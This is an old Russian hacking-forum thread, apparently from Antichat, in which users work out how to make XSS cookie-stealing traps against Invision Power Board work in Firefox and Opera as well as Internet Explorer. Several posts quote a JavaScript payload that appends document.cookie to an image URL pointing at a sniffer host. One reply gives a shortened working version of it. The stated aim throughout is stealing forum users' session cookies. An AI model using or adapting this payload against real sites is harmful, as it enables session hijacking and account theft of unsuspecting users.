Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Xss в зависимости от браузера на примере Ipb |
16.12.2006, 19:41
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Xss в зависимости от браузера на примере Ipb
Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.
1) Установил IPB локально
2) Установил локально сниффер
подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0
Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.
Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.
Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.
Создал тестовую хтмл, с текстом
Код:
<script>alert(document.cookie);</script>
<img src="http://localhost/s/s.gif">
<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие
Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает? |
|
|
16.12.2006, 19:55
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
----> как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?
Учись и больше читай.
|
|
|
|
16.12.2006, 20:46
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
такие советы я сам регулярно раздаю, я понимаю что не все скрипты одинаково работают, и соответсвенно разные приколы с приватностью и прочим.
Короче кто может детальной обьяснить, буду очень благодарен
|
|
|
|
18.12.2006, 22:02
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.
ЗЫ, подчисти ящик, а то он ПМ больше не принимает.
Grtzzz.
|
|
|
|
18.12.2006, 22:15
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от Azazel
---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.
то есть ты хочешь сказать что (выбрать нужное):
1) на данный момент нет готовых кодов для кражи кукисов из оперы/фаера
2) это не возможно
3) возможно, но надо рыть спецификацию
|
|
|
|
18.12.2006, 22:43
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Там есть разница в синтаксисе.
Готовые коды есть в Уязвимостях форумов.
Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.
White Jordan, во всех его воплощениях, тоже неплохо описывал.
В гугле я тоже много чего читал по этому поводу.
В приведённом тобой коде первые две строчки лишние.
|
|
|
|
18.12.2006, 22:48
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от Azazel
Там есть разница в синтаксисе.
Готовые коды есть в Уязвимостях форумов.
из тех что в теме "уязвимости IPB" у меня не один не сработал в Фаере/Опере
Сообщение от Azazel
Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.
White Jordan, во всех его воплощениях, тоже неплохо описывал.
линк не затруднит?
Сообщение от Azazel
В гугле я тоже много чего читал по этому поводу.
В приведённом тобой коде первые две строчки лишние.
В гугле я нашел кое-что, но не по теме, а о других различиях; а приведенный пример, это лишь отладка, я пытался выяснить что, когда и как работает с его помощью. Но сейчас попробую без первых двух
|
|
|
|
18.12.2006, 23:41
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код
|
|
|
|
18.12.2006, 23:52
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от _Great_
Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код
вот зараза...с первыми двумя строчками не работает, а сама по себе отлично. Проверено в Опере, Фаере. Надо сейчас только раздуплиться как сделать в кодах это, вы тоже подсказывайте, а то у меня ступор может начаться 
|
|
|
|
19.12.2006, 00:02
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Зачем такой длинный код?
Код:
<script>alert(document.cookie);</script>
<img src="http://localhost/s/s.gif">
<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Достаточно такого:
Код:
<script>var img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
